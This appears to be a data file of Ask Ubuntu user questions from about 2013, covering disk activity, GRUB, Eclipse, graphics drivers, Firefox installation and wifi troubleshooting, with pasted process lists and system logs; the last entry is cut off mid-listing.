259896	excessive harddisk activity in ubuntu 12.04	i 'm suffering from excessive hd activity in ubuntu 12.04 . if i check with iotop , i see ( and hear ) jbd2 flashing every second . i know that jbd2 is just the sync process for ext4 , so that 's a cause , not an effect . eclipse juno is running , but if i stop eclipse , it does not solve the problem . i 'm using the following kernel : 3.7.4-030704-generic here 's the output from ps -ef uid pid ppid c stime tty time cmd root 1 0 0 feb17 ? 00:00:00 /sbin/init root 2 0 0 feb17 ? 00:00:00 [ kthreadd ] root 3 2 0 feb17 ? 00:00:55 [ ksoftirqd/0 ] root 5 2 0 feb17 ? 00:00:00 [ kworker/0:0h ] root 7 2 0 feb17 ? 00:00:00 [ kworker/u:0h ] root 8 2 0 feb17 ? 00:00:00 [ migration/0 ] root 9 2 0 feb17 ? 00:00:00 [ rcu_bh ] root 10 2 0 feb17 ? 00:03:28 [ rcu_sched ] root 11 2 0 feb17 ? 00:00:01 [ watchdog/0 ] root 12 2 0 feb17 ? 00:00:01 [ watchdog/1 ] root 13 2 0 feb17 ? 00:01:04 [ ksoftirqd/1 ] root 14 2 0 feb17 ? 00:00:00 [ migration/1 ] root 16 2 0 feb17 ? 00:00:00 [ kworker/1:0h ] root 17 2 0 feb17 ? 00:00:01 [ watchdog/2 ] root 18 2 0 feb17 ? 00:00:56 [ ksoftirqd/2 ] root 19 2 0 feb17 ? 00:00:00 [ migration/2 ] root 21 2 0 feb17 ? 00:00:00 [ kworker/2:0h ] root 22 2 0 feb17 ? 00:00:01 [ watchdog/3 ] root 23 2 0 feb17 ? 00:00:57 [ ksoftirqd/3 ] root 24 2 0 feb17 ? 00:00:00 [ migration/3 ] root 26 2 0 feb17 ? 00:00:00 [ kworker/3:0h ] root 27 2 0 feb17 ? 00:00:00 [ cpuset ] root 28 2 0 feb17 ? 00:00:00 [ khelper ] root 29 2 0 feb17 ? 00:00:00 [ kdevtmpfs ] root 30 2 0 feb17 ? 00:00:00 [ netns ] root 31 2 0 feb17 ? 00:00:00 [ bdi-default ] root 32 2 0 feb17 ? 00:00:00 [ kintegrityd ] root 33 2 0 feb17 ? 00:00:00 [ kblockd ] root 34 2 0 feb17 ? 00:00:00 [ ata_sff ] root 35 2 0 feb17 ? 00:00:00 [ khubd ] root 36 2 0 feb17 ? 00:00:00 [ md ] root 39 2 0 feb17 ? 00:00:00 [ khungtaskd ] root 40 2 0 feb17 ? 00:00:00 [ kswapd0 ] root 41 2 0 feb17 ? 00:00:00 [ ksmd ] root 42 2 0 feb17 ? 00:00:00 [ khugepaged ] root 43 2 0 feb17 ? 00:00:00 [ fsnotify_mark ] root 44 2 0 feb17 ? 00:00:00 [ ecryptfs-kthrea ] root 45 2 0 feb17 ? 00:00:00 [ crypto ] root 56 2 0 feb17 ? 00:00:00 [ kthrotld ] root 60 2 0 feb17 ? 00:00:00 [ scsi_eh_0 ] root 61 2 0 feb17 ? 00:00:00 [ scsi_eh_1 ] root 62 2 0 feb17 ? 00:00:00 [ scsi_eh_2 ] root 63 2 0 feb17 ? 00:00:00 [ scsi_eh_3 ] root 64 2 0 feb17 ? 00:00:00 [ scsi_eh_4 ] root 67 2 0 feb17 ? 00:00:05 [ kworker/u:4 ] root 68 2 0 feb17 ? 00:00:02 [ kworker/u:5 ] root 69 2 0 feb17 ? 00:00:00 [ binder ] root 89 2 0 feb17 ? 00:00:00 [ deferwq ] root 90 2 0 feb17 ? 00:00:00 [ charger_manager ] root 91 2 0 feb17 ? 00:00:00 [ devfreq_wq ] root 256 2 0 feb17 ? 00:00:00 [ scsi_eh_5 ] root 257 2 0 feb17 ? 00:00:21 [ usb-storage ] root 313 2 0 feb17 ? 00:00:42 [ jbd2/sda2-8 ] root 314 2 0 feb17 ? 00:00:00 [ ext4-dio-unwrit ] root 400 1 0 feb17 ? 00:00:00 upstart-udev-bridge -- daemon root 484 1 0 feb17 ? 00:00:00 /sbin/udevd -- daemon root 713 2 0 feb17 ? 00:00:00 [ kpsmoused ] root 715 2 0 feb17 ? 00:00:00 [ irq/44-mei ] root 736 2 0 feb17 ? 00:00:00 [ kworker/2:1h ] root 745 2 0 feb17 ? 00:00:00 [ kvm-irqfd-clean ] root 765 2 0 feb17 ? 00:00:00 [ hd-audio0 ] root 811 2 0 feb17 ? 00:00:00 [ kworker/1:1h ] root 823 1 0 feb17 ? 00:00:00 upstart-socket-bridge -- daemon root 876 1 0 feb17 ? 00:00:00 /usr/sbin/sshd -d syslog 891 1 0 feb17 ? 00:00:16 rsyslogd -c5 102 944 1 0 feb17 ? 00:00:01 dbus-daemon -- system -- fork -- activation=upstart root 956 1 0 feb17 ? 00:00:00 /usr/sbin/modem-manager root 961 1 0 feb17 ? 00:00:00 /usr/sbin/bluetoothd avahi 978 1 0 feb17 ? 00:00:01 avahi-daemon : running [ devel03.local ] avahi 979 978 0 feb17 ? 00:00:00 avahi-daemon : chroot helper root 996 1 0 feb17 ? 00:00:00 /usr/sbin/cupsd -f root 1008 2 0 feb17 ? 00:00:00 [ krfcommd ] root 1011 2 0 feb17 ? 00:00:00 [ kworker/3:1h ] root 1019 1 0 feb17 tty4 00:00:00 /sbin/getty -8 38400 tty4 root 1027 1 0 feb17 tty5 00:00:00 /sbin/getty -8 38400 tty5 root 1034 1 0 feb17 tty2 00:00:00 /sbin/getty -8 38400 tty2 root 1035 1 0 feb17 tty3 00:00:00 /sbin/getty -8 38400 tty3 root 1036 1 0 feb17 ? 00:00:00 kdm root 1039 1 0 feb17 tty6 00:00:00 /sbin/getty -8 38400 tty6 root 1051 1 0 feb17 ? 00:00:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 1056 1 0 feb17 ? 00:00:00 networkmanager root 1057 1 0 feb17 ? 00:00:00 cron daemon 1058 1 0 feb17 ? 00:00:00 atd root 1088 1 0 feb17 ? 00:00:36 /usr/sbin/irqbalance mysql 1089 1 0 feb17 ? 00:01:30 /usr/sbin/mysqld root 1106 1 0 feb17 ? 00:00:00 /usr/lib/policykit-1/polkitd -- no-debug whoopsie 1164 1 0 feb17 ? 00:00:03 whoopsie root 1179 1036 0 feb17 tty7 00:39:56 /usr/bin/x :0 vt7 -br -nolisten tcp -auth /var/run/xauth/a:0-uypgua colord 1219 1 0 feb17 ? 00:00:00 /usr/lib/x86_64-linux-gnu/colord/colord root 1323 1 0 feb17 tty1 00:00:00 /sbin/getty -8 38400 tty1 nobody 1354 1056 0 feb17 ? 00:00:02 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var/run/se root 1391 1036 0 feb17 ? 00:00:00 -:0 root 1556 2 0 feb17 ? 00:00:15 [ kworker/0:1h ] root 1565 2 0 feb17 ? 00:00:05 [ flush-8:0 ] root 1567 1 0 feb17 ? 00:00:00 /usr/sbin/console-kit-daemon -- no-daemon mark 1640 1391 0 feb17 ? 00:00:01 gnome-session -- session=ubuntu mark 1694 1640 0 feb17 ? 00:00:01 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu mark 1697 1 0 feb17 ? 00:00:00 /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu mark 1698 1 0 feb17 ? 00:21:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session mark 1708 1640 0 feb17 ? 00:00:57 /usr/lib/gnome-settings-daemon/gnome-settings-daemon mark 1709 1 0 feb17 ? 00:00:00 gnome-keyring-daemon -- start -- components=gpg root 1718 1 0 feb17 ? 00:00:00 /usr/lib/upower/upowerd mark 1829 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfsd mark 1831 1 0 feb17 ? 00:00:00 /usr/lib/gvfs//gvfs-fuse-daemon -f /home/mark/.gvfs mark 1840 1640 1 feb17 ? 02:09:50 compiz mark 1846 1 0 feb17 ? 00:00:00 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 root 1848 1 0 feb17 ? 00:00:04 /usr/lib/accountsservice/accounts-daemon mark 1851 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfsd-metadata mark 1854 1640 0 feb17 ? 00:00:00 nm-applet mark 1855 1640 0 feb17 ? 00:00:00 /usr/lib/gnome-settings-daemon/gnome-fallback-mount-helper mark 1860 1640 0 feb17 ? 00:00:41 nautilus -n mark 1866 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfs-gdu-volume-monitor mark 1867 1640 0 feb17 ? 00:00:00 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 root 1870 1 0 feb17 ? 00:00:06 /usr/lib/udisks/udisks-daemon mark 1873 1640 0 feb17 ? 00:00:00 bluetooth-applet root 1878 1870 0 feb17 ? 00:00:00 udisks-daemon : not polling any devices mark 1883 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor mark 1886 1 0 feb17 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog rtkit 1888 1 0 feb17 ? 00:00:03 /usr/lib/rtkit/rtkit-daemon mark 1892 1 0 feb17 ? 00:00:15 /usr/lib/gvfs/gvfs-afc-volume-monitor mark 1903 1886 0 feb17 ? 00:00:00 /usr/lib/pulseaudio/pulse/gconf-helper mark 1905 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfsd-trash -- spawner :1.9 /org/gtk/gvfs/exec_spaw/0 mark 1907 1 0 feb17 ? 00:00:00 /usr/lib/gvfs/gvfsd-burn -- spawner :1.9 /org/gtk/gvfs/exec_spaw/1 mark 1913 1 0 feb17 ? 00:04:34 /usr/lib/bamf/bamfdaemon mark 1932 1840 0 feb17 ? 00:00:00 /bin/sh -c /usr/bin/compiz-decorator mark 1933 1932 0 feb17 ? 00:00:48 /usr/bin/gtk-window-decorator mark 1936 1 1 feb17 ? 01:22:24 /usr/lib/unity/unity-panel-service mark 1938 1 0 feb17 ? 00:51:00 /usr/lib/indicator-appmenu/hud-service mark 1948 1 0 feb17 ? 00:00:00 /usr/lib/indicator-sound/indicator-sound-service mark 1950 1 1 feb17 ? 01:48:22 /usr/lib/indicator-application/indicator-application-service mark 1952 1 0 feb17 ? 00:00:00 /usr/lib/indicator-printers/indicator-printers-service mark 1954 1 0 feb17 ? 00:00:00 /usr/lib/indicator-datetime/indicator-datetime-service mark 1957 1 0 feb17 ? 00:00:00 /usr/lib/indicator-session/indicator-session-service mark 1958 1 0 feb17 ? 00:00:00 /usr/lib/indicator-messages/indicator-messages-service mark 1991 1640 0 feb17 ? 00:00:01 /usr/lib/gnome-disk-utility/gdu-notification-daemon mark 2003 1 0 feb17 ? 00:00:00 /usr/lib/geoclue/geoclue-master mark 2005 1 0 feb17 ? 00:00:00 /usr/lib/ubuntu-geoip/ubuntu-geoip-provider mark 2008 1640 0 feb17 ? 00:00:00 telepathy-indicator mark 2010 1 0 feb17 ? 00:00:00 /usr/lib/telepathy/mission-control-5 mark 2015 1640 0 feb17 ? 00:00:29 gnome-screensaver mark 2016 1640 0 feb17 ? 00:00:05 zeitgeist-datahub mark 2022 1 0 feb17 ? 00:00:00 /usr/bin/zeitgeist-daemon mark 2030 1 0 feb17 ? 00:00:00 /usr/lib/zeitgeist/zeitgeist-fts mark 2038 2030 0 feb17 ? 00:00:00 /bin/cat mark 2045 1640 0 feb17 ? 00:00:20 update-notifier mark 2068 1 0 feb17 ? 00:00:07 /usr/lib/unity-lens-applications/unity-applications-daemon mark 2070 1 0 feb17 ? 00:00:00 /usr/lib/unity-lens-files/unity-files-daemon mark 2072 1 0 feb17 ? 00:00:00 /usr/lib/unity-lens-music/unity-music-daemon mark 2074 1 0 feb17 ? 00:00:00 /usr/bin/python /usr/lib/unity-lens-video/unity-lens-video mark 2121 1 0 feb17 ? 00:00:00 /usr/bin/python /usr/lib/unity-scope-video-remote/unity-scope-video-remote mark 2182 1640 0 feb17 ? 00:00:01 /usr/lib/deja-dup/deja-dup/deja-dup-monitor root 3051 2 0 feb21 ? 00:00:03 [ kworker/3:2 ] lp 3866 996 0 08:04 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // root 4952 2 0 18:15 ? 00:00:01 [ kworker/1:0 ] mark 6572 1 0 20:07 ? 00:00:02 /usr/bin/python /usr/bin/terminator mark 6581 6572 0 20:07 ? 00:00:00 [ /usr/bin/termin ] < defunct > mark 6582 6572 0 20:07 pts/0 00:00:00 /bin/bash mark 6785 1 0 20:09 ? 00:00:00 /home/mark/applications/eclipse/eclipse mark 6787 6785 8 20:09 ? 00:02:56 /usr/bin/java -djava.library.path=/usr/lib/x86_64-linux-gnu/jni -dosgi.requiredjavaversion=1.6 -dosgi . root 6832 2 0 feb19 ? 00:00:35 [ kworker/0:1 ] mark 8738 1 3 feb20 ? 01:59:00 /usr/lib/firefox/firefox mark 8760 1 0 feb20 ? 00:00:00 /usr/lib/at-spi2-core/at-spi-bus-launcher mark 8786 1 0 feb20 ? 00:00:00 /usr/lib/dconf/dconf-service mark 8804 1 0 feb20 ? 00:00:00 /usr/lib/notify-osd/notify-osd root 9022 1 0 feb20 ? 00:00:00 /usr/bin/python /usr/lib/system-service/system-service-d root 14626 2 0 20:17 ? 00:00:00 [ kworker/2:1 ] root 14719 2 0 20:17 ? 00:00:00 [ kworker/3:1 ] root 15555 2 0 20:22 ? 00:00:00 [ kworker/0:0 ] root 15776 2 0 20:37 ? 00:00:00 [ kworker/1:1 ] mark 15840 6582 0 20:44 pts/0 00:00:00 ps -ef root 16003 2 0 feb20 ? 00:00:11 [ kworker/2:2 ] root 18154 2 0 feb20 ? 00:00:00 [ xfsalloc ] root 18155 2 0 feb20 ? 00:00:00 [ xfs_mru_cache ] root 18156 2 0 feb20 ? 00:00:00 [ xfslogd ] root 18159 2 0 feb20 ? 00:00:00 [ jfsio ] root 18160 2 0 feb20 ? 00:00:00 [ jfscommit ] root 18161 2 0 feb20 ? 00:00:00 [ jfscommit ] root 18162 2 0 feb20 ? 00:00:00 [ jfscommit ] root 18163 2 0 feb20 ? 00:00:00 [ jfscommit ] root 18164 2 0 feb20 ? 00:00:00 [ jfssync ] root 18183 484 0 feb20 ? 00:00:00 /sbin/udevd -- daemon root 18184 484 0 feb20 ? 00:00:00 /sbin/udevd -- daemon mark 20300 1 0 feb20 ? 00:00:03 remmina mark 23168 1 0 feb20 ? 00:00:00 /usr/lib/gvfs/gvfsd-http -- spawner :1.9 /org/gtk/gvfs/exec_spaw/2 mark 28321 1 0 feb20 ? 00:00:00 /bin/bash /usr/lib/mysql-workbench/bin/mysql-workbench mark 28325 28321 0 feb20 ? 00:00:00 /bin/sh /usr/bin/catchsegv /usr/lib/mysql-workbench/bin/mysql-workbench-bin mark 28327 28325 0 feb20 ? 00:05:28 /usr/lib/mysql-workbench/bin/mysql-workbench-bin what do i do to eliminate this ?
259897	how to install grub on the hard-disk ?	i 'm kinda new to linux . i wanted to install ubuntu , so i installed ubuntu alongside windows 7 , ( i partitioned my hdd and left it unallocated ) ubuntu did not ask where to install and stuff , it just installed . so i rebooted the pc , to boot ubuntu , but there was no grub , it booted straight to windows 7 . so i found this question : no grub after installing ubuntu beside windows 7 so i wanted to try what it said in the answer of that question , so i inserted my liveusb , and booted from it , and the grub appeared ! i do n't know why when i boot from that usb , grub appears . so i booted ubuntu and it works . but i see the grub only when the usb flash drive is connected . so it looks like the grub installed in the usb . my question is , how can i transfer grub to my default partition , so i can get grub without having to boot from the liveusb .
259900	install basic applications on ubuntu 12.10	i have just installed ubuntu 12.10 ( without internet at the time of installation ) , and even some basic applications like vim are not installed in it . what should i do so that these applications ( which i guess , would have been installed if i were to install with internet ) ?
259905	transmission web client : strange charasters in file names	i have nas : operating system : ubuntu linux 12.04.1 kernel and cpu : linux 3.2.0-34-generic on x86_64 transmission 2.51 ( 13280 ) on all operating system ( browser chrome ) web client transmission in file names after point of becoming a symbol '' & # 8203 ; '' ( without space ) '' the. & # 8203 ; big. & # 8203 ; bang. & # 8203 ; theory. & # 8203 ; s06e05. & # 8203 ; 720p. & # 8203 ; web-dl‌​. & # 8203 ; rus. & # 8203 ; eng. & # 8203 ; mkv 810.7 mb of 810.7 mb ( 100 % ) '' ( without space ) how to remove these characters ?
259908	ca n't update eclipse juno in ubuntu 12.10	i 'm trying to get updates and install new plugin from eclipse juno ( 4.2 ) on ubuntu 12.10 ( amd/x64 ) . i 've tried every solution posted on this forum for previous versions ( changing proxy settings , changing java/jdk settings , installing gtk , adding '-djava.net.preferipv4stack=true ' do /etc/eclipse.ini ... etc ) . i always get the following : 'eclipse.buildid=m20120914-1800 java.version=1.7.0_15 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 error fri feb 22 15:15:07 brt 2013 communication with repository at http : //download.eclipse.org/releases/juno failed . java.net.sockettimeoutexception : connect timed out at java.net.sockssocketimpl.readsocksreply ( sockssocketimpl.java:126 ) at java.net.sockssocketimpl.connect ( sockssocketimpl.java:459 ) at java.net.socket.connect ( socket.java:579 ) at org.eclipse.ecf.provider.filetransfer.events.socket.socketeventcreateutil.createsocket ( socketeventcreateutil.java:43 ) at org.eclipse.ecf.internal.provider.filetransfer.httpclient.ecfhttpclientprotocolsocketfactory.createsocket ( ecfhttpclientprotocolsocketfactory.java:81 ) at org.eclipse.ecf.internal.provider.filetransfer.httpclient.ecfhttpclientprotocolsocketfactory.createsocket ( ecfhttpclientprotocolsocketfactory.java:73 ) at org.eclipse.ecf.internal.provider.filetransfer.httpclient.ecfhttpclientprotocolsocketfactory.createsocket ( ecfhttpclientprotocolsocketfactory.java:65 ) at org.apache.commons.httpclient.httpconnection.open ( httpconnection.java:707 ) at org.apache.commons.httpclient.multithreadedhttpconnectionmanager $ httpconnectionadapter.open ( multithreadedhttpconnectionmanager.java:1361 ) at org.apache.commons.httpclient.httpmethoddirector.executewithretry ( httpmethoddirector.java:387 ) at org.apache.commons.httpclient.httpmethoddirector.executemethod ( httpmethoddirector.java:171 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:397 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:346 ) at org.eclipse.ecf.provider.filetransfer.httpclient.httpclientfilesystembrowser.runrequest ( httpclientfilesystembrowser.java:232 ) at org.eclipse.ecf.provider.filetransfer.browse.abstractfilesystembrowser $ directoryjob.run ( abstractfilesystembrowser.java:69 ) at org.eclipse.core.internal.jobs.worker.run ( worker.java:53 )
259909	how to fix video tearing with kde and ati drivers ?	i have ubuntu 12.04.02 x64 and kde 4.10.00 . i 'm having a little video tearing while playing any video ( hd mkv , avi , etc. ) . it happens with vlc latest version and with default ubuntu video player and also with other players like kmplayer . i have some effects enabled and i use : opengl , raster , shaders : opengl 2 and vertical sync . i have ati msi r6870 hawk with latest fglrx video card driver amd catalystâ˘ 13.1 proprietary linux display driver my pc hardware are : cpu : intel ( r ) core ( tm ) i5-2500 sandy bridge motherboard : asus p8p67 pro display : full hd display ( dvi ) glxinfo says direct rendering : yes no problem with windows 7 . how to solve it ?
259910	rearrange icons in unity ubuntu 12.04	can someone help me in rearranging the icons in my ubuntu 12.04 unity launcher . the left click hold and move is not working for me . is there a better and clean way which would also survive a reboot ?
259911	windows home server 2011 connection issue	i am currently dual booting ubuntu on a pc and it 's all going great . however i have an issue when trying to connect to my server running windows home server 2011 . ubuntu says it `` can not mount the location , failed to transfer the file list '' the thing is , if i turn on my laptop , running windows 7 and the whs2011 launchpad app , ubuntu has no trouble getting onto the server and mounting the folders . when i turn off the laptop , the connection to the server is lost . no idea what 's causing this strange issue . thanks .
259919	display power saver logs me out	i recently got a second display . i am attempting to set it up so the two displays are in twinview , with one landscape and one portrait orientation . after getting everything to work the way i wanted , i have a big problem . whenever the computer is idle long enough for the power saver to shut off my displays , i get logged out . so , in other words , go to lunch , come back and all my work is gone . note that the box does not reboot ... just get logged out . i am running : ubuntu 12.10 : linux 3.5.0-25-generic # 38-ubuntu smp x86_64 nvidia-current-updates : 304.51-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library dell laptop : latitude e6510 used `` system settings '' - > '' display '' to rotate the one display to portrait . found this suggestion to reinstall nvidia and tried that . purged my nvidia packages , installed linux-source , linux-headers-generic and finally nvidia-current-updates . problem persists . not a lot in my .xsession-errors . here is the tail end of it : compiz ( core ) - info : starting plugin : unityshell ** message : using fallback from indicator to gtkstatusicon ( gnome-settings-daemon:7404 ) : color-plugin-warning ** : failed to reset xrandr-dp-3 gamma tables : gamma size is zero ** message : moving back from gtkstatusicon to indicator ** ( zeitgeist-datahub:7881 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! [ 7880:7914:0222/145113 : error : object_proxy.cc ( 624 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 7880:7914:0222/145113 : error : object_proxy.cc ( 624 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 7880:7880:0222/145114 : error : object_proxy.cc ( 529 ) ] failed to call method : org.chromium.mtpd.enumeratestorages : object_path= /org/chromium/mtpd : org.freedesktop.dbus.error.serviceunknown : the name org.chromium.mtpd was not provided by any .service files [ 7880:7933:0222/145114 : error : download_updates_command.cc ( 129 ) ] postclienttoservermessage ( ) failed during getupdates ** ( nautilus:7439 ) : warning ** : error calling current_status : method `` current_status '' with signature `` '' on interface `` com.ubuntuone.syncdaemon.status '' does n't exist ** ( nautilus:7439 ) : critical ** : syncdaemon_status_info_get_online : assertion `syncdaemon_is_status_info ( sinfo ) ' failed [ 7880:7933:0222/150344 : error : download_updates_command.cc ( 129 ) ] postclienttoservermessage ( ) failed during getupdates [ 7880:7933:0222/152229 : error : download_updates_command.cc ( 129 ) ] postclienttoservermessage ( ) failed during getupdates [ 7880:7880:0222/152658 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( ) [ 7880:7880:0222/152741 : error : omnibox_view_gtk.cc ( 431 ) ] not implemented reached in virtual void omniboxviewgtk : :applycaretvisibility ( )
259921	make firefox user agent appear as windows ?	is it possible to make firefox or any other browser user agent appear like it would be windows ? because my online-banking refuses access due to my operating system . the only accepted os is windows .
259923	ca n't install or upgrade firefox at all	i 've run into a frustrating problem when attempting to upgrade firefox . i was running version 16 attempting to upgrade to version 18 through synaptic . i received the following error : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_18.0.2+build1-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-globalmenu_18.0.2+build1-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.91.14 80 ] my problem is very similar to : firefox update fails with `` not found '' error so i followed the advice there . no success . i tried changing the server many times , but this brought up another error . i then tried removing the firefox package ( not a complete removal to preserve settings ) and figured i could switch servers and try re-installing the package from scratch . i still receive the 404 error on us servers , and when i switch to main servers , i get : e : i was n't able to locate a file for the firefox package . this might mean you need to manually fix this package . using apt-get it says : package firefox is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'firefox ' has no installation candidate i now have no firefox at all and ca n't reinstall the package through synaptic , ubuntu software center , nor apt-get . how can i get firefox reinstalled ?
259930	is there ubuntu 12.10 gnome version with wubi installer ?	the question says it all . i want to have ubuntu 12.10 gnome version . i ca n't find any wubi version . is this even possible ?
259936	problems running deja dup with elevated priveleges	as advised by this answer , i 'm using gksu deja-dup-preferences and gksu `` deja-dup -- backup '' to backup my data , including files that have root-only permissions on them . both of the two ways lead to the same two problems as perceived in comparison to how deja dup regularly works . no report appears after backup is finished . regular deja dup used to bring up a notification , saying that backup is complete , but not in this case . deja dup run with elevated privileges does not memorize either my amazon s3 secret access key or the encryption password , i have to reenter them over and over again . running deja-dup -- backup in the regular mode always used to apply the passwords from the last successful backup provided that backup destinations match ( i had `` remember password '' option turned on in all cases , of course ) . hence , i 'm not certain if automatic backup is going to work if enable it for the root mode deja dup and it 's gon na take about 2 days to check it .
259942	booting system without full network configuration	i was trying to solve internet problems , and seem to have made things worse : now when i start the computer it gets stuck on `` booting system without full network configuration '' . does anyone know how to make it unstuck ? alternatively : it got messed up when i changed the contents of /etc/network/interfaces , so presumably would work again if i changed it back . how can i edit this file during boot ? i 'm using ubuntu 12.10 .
259948	i need help in ubuntu development	i am new in programming and i want to develop ubuntu phone os , what is programming languages should i learn to start developing ?
259955	do you have to be rooted to run ubuntu on the nexus 4 ?	i have a nexus 4 and i want to flash ubuntu onto it . do i have to be rooted to do this ? and is ubuntu stable for phones ?
259957	why can i not use gksudo/sudo with any gui program ?	in my ubuntu 12.04.2 with gnome-shell i 'm not able anymore to run any graphical programs with gksudo or sudo . i always get an error like can not open display i do n't remember any particular changes i 've done manually apart of the regular updates . i use also gnome3 ppa and q-series lts backport ppa . i noticed also that i 'm not able anymore to install extensions from the website , but i think it 's not related , of course i 'm not sure too : ) i 've already spent time and effort searching the topic everywhere and the few i found did n't give any solution for me . i do n't want to reinstall .
259958	chromebook c7 - installation	i just downloaded the ubuntu file to my chromebook and its not letting me open the file to actually download it . when i click on it to open the file it tells me to go to the chromestore to find an app that can open this type of file because the file is not supported . i just got my chromebook today so i dont think its a computer issue . i do n't understand why it 's not letting me open the file . i downloaded it directly off of the ubuntu website and downloaded what ubuntu had recommended me to download .
259962	can ubuntu repair windows 7 that wo n't boot ?	so my old computers motherboard died and right in the middle of a windows boot . as you imagine , after buying a new and suitable rig windows 7 will not boot . windows gets to the `` windows starting up '' animation and restarts . when the computer restarts it goes to the startup repair which says it can not be repaired . however , with ubuntu installed , all hdd files are accounted for and all components work well . is there a way for ubuntu to repair the booting process without compromising any files on the hdd ? thanks !
259967	ca n't turn on wifi on lenovo z580 using fn+f5	i ca n't turn my wireless adapter on using the network settings it says wireless is disabled by wireless switch . on my computer the hardware switch is fn+f5 . when i press it nothing happens . anyone have any idea how to fix this problem ? i found out my hard ware witch although it doesnât do any thing works fine . when i do # rfkill list i get 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes 1 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no then i pressed fn + f5 and did # rfkill list and got the below result 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no that proves that the key combination works . i checked my bios too wlan is enabled . and # sudo lshw -class network gave me *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 04:7d:7b : f2 : b6:4d size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.0.7 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 74 : e5:43:0f:2f:47 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-25-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : f0500000-f050ffff command : lspci -nnk | grep -ia2 net result : 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : lenovo device [ 17aa:3975 ] kernel driver in use : r8169 -- 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : lenovo device [ 17aa:31a1 ] kernel driver in use : ath9k command : lsmod result : module size used by ipheth 13449 0 snd_hda_codec_hdmi 32049 1 snd_hda_codec_realtek 78147 1 parport_pc 32689 0 ppdev 17074 0 bnep 18141 2 rfcomm 46620 0 coretemp 13401 0 kvm 414071 0 ghash_clmulni_intel 13221 0 aesni_intel 51038 0 cryptd 20404 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel microcode 22804 0 ideapad_laptop 18087 0 sparse_keymap 13891 1 ideapad_laptop arc4 12530 2 snd_hda_intel 33492 3 snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq wmi 19071 0 joydev 17458 0 mac_hid 13206 0 snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ath9k 131355 0 mac80211 540032 